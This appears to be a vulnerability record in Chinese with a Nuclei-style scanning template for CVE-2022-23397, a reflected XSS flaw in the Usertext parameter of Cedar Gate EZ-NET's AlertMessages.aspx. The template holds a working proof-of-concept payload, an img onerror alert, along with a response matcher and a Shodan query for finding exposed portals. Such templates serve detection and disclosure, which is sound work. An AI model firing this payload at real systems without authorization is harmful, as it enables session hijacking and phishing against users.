漏洞名称: Cedar Gate EZ-NET Reflected XSS Vulnerability
漏洞编号:
CVE: CVE-2022-23397
漏洞类型: 跨站可执行脚本
漏洞等级: 中危
漏洞描述: Cedar Gate EZ-NET是一款网络门户产品,广泛用于企业级服务中,提供网络管理和用户交互功能。该产品在6.5.5至6.8.0版本中存在一个反射型跨站脚本(XSS)漏洞。此漏洞的根源在于EZ-NET门户在处理用户通过URL参数发送的数据时,未能正确地对数据进行清理和验证,导致恶意脚本可以被注入并在用户浏览器中执行。具体来说,攻击者可以通过构造特定的URL,利用AlertMessages.aspx页面中的Usertext参数注入恶意JavaScript代码。由于缺乏适当的输入验证和输出编码,当其他用户访问这个恶意链接时,注入的脚本将在他们的浏览器中执行,可能导致会话劫持、钓鱼攻击或其他恶意操作。此漏洞的利用不需要用户认证,且可以远程触发,但由于需要用户交互(如点击恶意链接),其自动化利用的可能性较低。尽管如此,考虑到XSS漏洞的普遍性和潜在危害,建议用户尽快升级到安全版本以避免潜在的安全风险。
info: name: Cedar Gate EZ-NET <= 6.8.0 - Reflected XSS author: srilakivarma severity: medium description: | The Cedar Gate EZ-NET portal 6.5.5 6.8.0 Internet portal has a call to display messages to users which does not properly sanitize data sent in through a URL parameter. This leads to a Reflected Cross-Site Scripting vulnerability. reference: - https://ado.im/cedar-gate-ez-net - https://nvd.nist.gov/vuln/detail/CVE-2022-23397 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-23397 cwe-id: CWE-79 epss-score: 0.00228 epss-percentile: 0.45565 cpe: cpe:2.3:a:cedargate:ez-net_portal:6.5.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cedargate product: ez-net_portal shodan-query: html:"EZ-NET™ Login" tags: cve,cve2022,cedar,eznet,xss
http: - method: GET path: - "{{BaseURL}}/EZ-NET60/AlertMessages.aspx?Usertext=<img%20src%3Dx%20onerror%3Dalert(document.domain)>"
matchers: - type: word part: body words: - '><img src=x onerror=alert(document.domain)></span>' - '/EZ-NET60/' condition: and